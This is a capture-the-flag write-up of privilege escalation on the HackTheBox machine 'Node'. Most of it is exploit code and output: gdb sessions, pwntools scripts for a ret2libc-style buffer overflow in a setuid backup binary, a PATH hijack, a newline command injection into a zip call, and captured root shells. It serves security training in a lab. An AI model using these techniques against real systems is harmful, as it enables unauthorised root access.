("As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay"...) 0028| 0xffec6c1c ("s1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7"...) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x31724130 in ?? () gdb-peda$ quit u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_offset -q 0x31724130 [*] Exact match at offset 512

As expected the offset value is 512 (the local variable length is 508).

EIP control

We build the skeleton of our exploit controlling the value of EIP.

u505@kali:~/HTB/Machines/Node$ cat exploit_deadc0de.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
after = 'U'*8
payload = junk + p32(eip) + after
print payload
#file = open("payload","w")
#file.write (payload)
#file.close()

And run it on gdb

gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒▒▒UUUUUUUU
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x22f EBX: 0xff881f90 --> 0x4 ECX: 0x0 EDX: 0x804938b --> 0x712d00 () ESI: 0xf7f70000 --> 0x1dfd6c EDI: 0xff881edf --> 0x796500 () EBP: 0x44444444 ('DDDD') ESP: 0xff880eb0 ("UUUUUUUU") EIP: 0xdeadc0de EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0xdeadc0de [------------------------------------stack-------------------------------------] 0000| 0xff880eb0 ("UUUUUUUU") 0004| 0xff880eb4 ("UUUU") 0008| 0xff880eb8 --> 0x8499500 --> 0x0 0012| 0xff880ebc --> 0x8048a1b (<main+30>: sub esp,0xc) 0016| 0xff880ec0 --> 0x0 0020| 0xff880ec4 --> 0x0 0024| 0xff880ec8 --> 0x0 0028| 0xff880ecc --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xdeadc0de in ?? ()

As expected, the bufferoverflow occurs with Instruction register value 0xdeadc0de,and the stack contains 8 U.

Exploitation strategy

The executable declares several library functions. These functions are directly accessible with a valid program address.

gdb-peda$ elfsymbol
Found 24 symbols
strstr@plt = 0x80485e0
strcmp@plt = 0x80485f0
strcspn@plt = 0x8048610
fgets@plt = 0x8048620
fclose@plt = 0x8048630
time@plt = 0x8048640
geteuid@plt = 0x8048650
strcat@plt = 0x8048660
strcpy@plt = 0x8048670
getpid@plt = 0x8048680
puts@plt = 0x8048690
system@plt = 0x80486a0
clock@plt = 0x80486b0
exit@plt = 0x80486c0
srand@plt = 0x80486d0
strchr@plt = 0x80486e0
__libc_start_main@plt = 0x80486f0
fopen@plt = 0x8048700
strncpy@plt = 0x8048710
access@plt = 0x8048730
setuid@plt = 0x8048740
sprintf@plt = 0x8048750
remove@plt = 0x8048760
__gmon_start__@plt = 0x8048770

There are calls to system and exit from the program, so we can use them directly. We also need a string that can be used as a command.

Node16.png

The string "Validated access token" is a good candidate as command to be called. The word token could be a valid command.

gdb-peda$ find token
Searching for 'token' in: None ranges
Found 6 results, display max 6 items:
backupnode : 0x8049875 ("token")
      libc : 0xf7f1dd34 ("token.type)")
ld-2.30.so : 0xf7fc5986 ("token")
ld-2.30.so : 0xf7fc5d5f ("token substitution\n")
ld-2.30.so : 0xf7fc5d89 ("token substitution")
   [stack] : 0xff880ac9 ("token")
gdb-peda$ x/s 0x8049875
0x8049875:      "token"
gdb-peda$  x/6x 0x8049875
0x8049875:      0x74    0x6f    0x6b    0x65    0x6e    0x00
gdb-peda$ x/6d 0x8049875
0x8049875:      116     111     107     101     110     0

The address 0x8049875 contains the word token and it's followed by a null character.

u505@kali:~/HTB/Machines/Node$ cat exploit_token.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
systemadd=0x80486a0
exitaddr=0x80486c0
tokenaddr=0x8049875

payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr) print payload #file = open("payload","w") #file.write (payload) #file.close()

First try in gdb.

gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`
Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ [Attaching after process 9162 vfork to child process 9165] [New inferior 2 (process 9165)] [Detaching vfork parent process 9162 after child exec] [Inferior 1 (process 9162) detached] process 9165 is executing new program: /usr/bin/dash sh: 1: token: not found [Inferior 2 (process 9165) exited with code 0177] Warning: not running

And as expected, a new shell ran and try to execute the command token, that is obviously not found.

Final test

First we set same permissions to backup program as the target program.

u505@kali:~/HTB/Machines/Node$ sudo chown root backupnode
u505@kali:~/HTB/Machines/Node$ sudo chmod 4755 backupnode
u505@kali:~/HTB/Machines/Node$ ls -l backupnode
-rwsr-xr-x 1 root u505 16484 May 15 20:25 backupnode

We create a file name token.

u505@kali:~/HTB/Machines/Node$ echo whoami > token
u505@kali:~/HTB/Machines/Node$ chmod +x token
u505@kali:~/HTB/Machines/Node$ token
-bash: token: command not found

The command is not found, because it's not in the PATH.

u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ export PATH=`pwd`:$PATH
u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/HTB/Machines/Node:/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ token
u505

Now our command "token" works, we modify our exploit script to write the payload to file.

u505@kali:~/HTB/Machines/Node$ echo /bin/bash > token
u505@kali:~/HTB/Machines/Node$ cat exploit_token.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
systemadd=0x80486a0
exitaddr=0x80486c0
tokenaddr=0x8049875

payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr) #print payload file = open("payload","w") file.write (payload) file.close() u505@kali:~/HTB/Machines/Node$ python exploit_token.py u505@kali:~/HTB/Machines/Node$ ls -l payload -rw-r--r-- 1 u505 u505 524 May 20 21:50 payload

We execute our exploit.

u505@kali:~/HTB/Machines/Node$ ./backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ kali:~/HTB/Machines/Node# id uid=0(root) gid=1000(u505) groups=1000(u505),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),120(scanner) kali:~/HTB/Machines/Node# exit exit

Exploitation on target

Copy of our payload

u505@kali:~/HTB/Machines/Node$ scp payload mark@node.htb:/tmp/
mark@node.htb's password:
payload                                        100%  524    13.0KB/s   00:00

From the target:

tom@node:/tmp$ ls -l payload
ls -l payload
-rw-r--r-- 1 mark mark 524 May 16 04:01 payload
tom@node:/tmp$ echo "/bin/bash" >/tmp/token
echo "/bin/bash" >/tmp/token
tom@node:/tmp$ chmod +x /tmp/token
chmod +x /tmp/token
tom@node:/tmp$ export PATH=`pwd`:$PATH
export PATH=`pwd`:$PATH

And we execute the exploit.

tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`
<e72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
root@node:/tmp# id id uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin) root@node:/tmp# cat /root/root.txt cat /root/root.txt <ROOT_FLAG>

Alternative Abuse folder name

The character \n (Carriage return) is not in the list of prohibited characters.

/usr/bin/zip -r -P magicword tempfile folder > /dev/null

If we can convert the command to

/usr/bin/zip -r -P magicword tempfile payload
/bin/bash
echo this command is invisible > /dev/null

We should gain root access. The last line is because /dev/null would redirect our shell to /dev/null if we do not add a third line and shell responses would be invisible.The $ is interpreted by our shell, and not send to the program ($ is a prohibited chraracter).

tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'payload \n /bin/bash \n echo this command is invisble')"
< "$(printf 'payload \n /bin/bash \n echo this command is invisble')"



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving payload /bin/bash echo this command is invisble adding: payload (deflated 96%) To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
root@node:/tmp# cat /root/root.txt cat /root/root.txt <ROOT_FLAG> root@node:/tmp# exit exit exit [+] Finished! Encoded backup is below:
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAAAP1w5OY0DzOHuxQyVtcnwZCpJgAIypSvOoc5EhfFSNUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==

Really, we don't need the printf function, we can do it directly on the command line adding returns between " "

tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "payload
> /bin/sh
> echo junk"
  adding: payload (deflated 96%)
# id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
# exit
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAADtx+YFsJWsrYh3pL6S28VuplrALHCzh4x3SkL8gzccUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==

References

Daniel Simao 19:21, 16 May 2020 (EDT)